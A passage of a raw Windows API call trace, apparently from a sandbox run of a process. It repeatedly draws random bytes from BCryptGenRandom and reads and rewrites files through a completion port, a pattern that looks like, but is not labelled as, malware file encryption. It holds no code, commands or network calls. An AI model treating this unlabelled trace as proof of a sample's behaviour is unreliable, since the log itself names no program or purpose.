lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.255] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.256] CloseHandle (hObject=0x2a4) returned 1 [0166.256] free (_Block=0x3df0008) [0166.256] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.263] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.264] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0166.264] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.264] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0166.264] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.264] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.264] free (_Block=0x3e305b8) [0166.264] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.264] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.265] free (_Block=0x1fa91d0) [0166.265] free (_Block=0x1fa2ed8) [0166.265] free (_Block=0x1fa90b8) [0166.265] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.266] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.267] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.267] CloseHandle (hObject=0x2a4) returned 1 [0166.267] free (_Block=0x3df0008) [0166.267] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.275] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0166.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.276] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.276] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0166.276] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.276] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.276] free (_Block=0x3e305b8) [0166.276] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.276] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.277] free (_Block=0x1fa91d0) [0166.277] free (_Block=0x1fa2ed8) [0166.277] free (_Block=0x1fa90b8) [0166.277] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.278] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.279] CloseHandle (hObject=0x2a4) returned 1 [0166.280] free (_Block=0x3df0008) [0166.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.301] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.302] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0166.302] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.302] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.302] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0166.303] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.303] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.303] free (_Block=0x3e305b8) [0166.303] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.303] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.303] free (_Block=0x1fa91d0) [0166.303] free (_Block=0x1fa2ed8) [0166.303] free (_Block=0x1fa90b8) [0166.303] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.307] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4040, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.316] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4d18, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0166.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.318] CloseHandle (hObject=0x2a4) returned 1 [0166.318] free (_Block=0x3df0008) [0166.318] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0166.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0166.326] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.326] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.327] free (_Block=0x3e305b8) [0166.327] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.327] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.327] free (_Block=0x1fa91d0) [0166.327] free (_Block=0x1fa2ed8) [0166.327] free (_Block=0x1fa90b8) [0166.327] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.327] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.328] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x47f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.338] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8b4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0166.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0166.351] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0166.352] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.352] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.352] free (_Block=0x3e305b8) [0166.352] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.352] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.352] free (_Block=0x1fa91d0) [0166.352] free (_Block=0x1fa2ed8) [0166.352] free (_Block=0x1fa90b8) [0166.352] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.353] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.353] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.365] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5aa4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.367] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.382] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1cf8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.383] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.383] CloseHandle (hObject=0x2a8) returned 1 [0166.384] free (_Block=0x1ff1e60) [0166.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.393] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0166.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0166.394] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.394] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.394] free (_Block=0x3e305b8) [0166.394] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.394] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.395] free (_Block=0x1fa91d0) [0166.395] free (_Block=0x1fa2ed8) [0166.395] free (_Block=0x1fa90b8) [0166.395] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.395] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.396] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.396] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.474] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x14030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.516] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1ef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0166.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0166.527] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.527] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.527] free (_Block=0x3e305b8) [0166.527] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.527] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.527] free (_Block=0x1fa91d0) [0166.527] free (_Block=0x1fa2ed8) [0166.527] free (_Block=0x1fa90b8) [0166.527] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.527] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0166.536] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0166.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0166.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0166.537] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0166.537] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0166.537] free (_Block=0x3e305b8) [0166.537] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0166.537] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0166.537] free (_Block=0x1fa91d0) [0166.537] free (_Block=0x1fa2ed8) [0166.537] free (_Block=0x1fa90b8) [0166.537] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0166.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.546] CloseHandle (hObject=0x3cc) returned 1 [0166.546] free (_Block=0x3d70450) [0166.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.554] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5670, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.559] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.575] CloseHandle (hObject=0x2a8) returned 1 [0166.576] free (_Block=0x1ff1e60) [0166.576] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.581] CloseHandle (hObject=0x308) returned 1 [0166.581] free (_Block=0x3e70008) [0166.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.599] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0166.600] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0166.613] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb12c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0166.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.389] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x3fa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0167.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0167.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0167.398] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 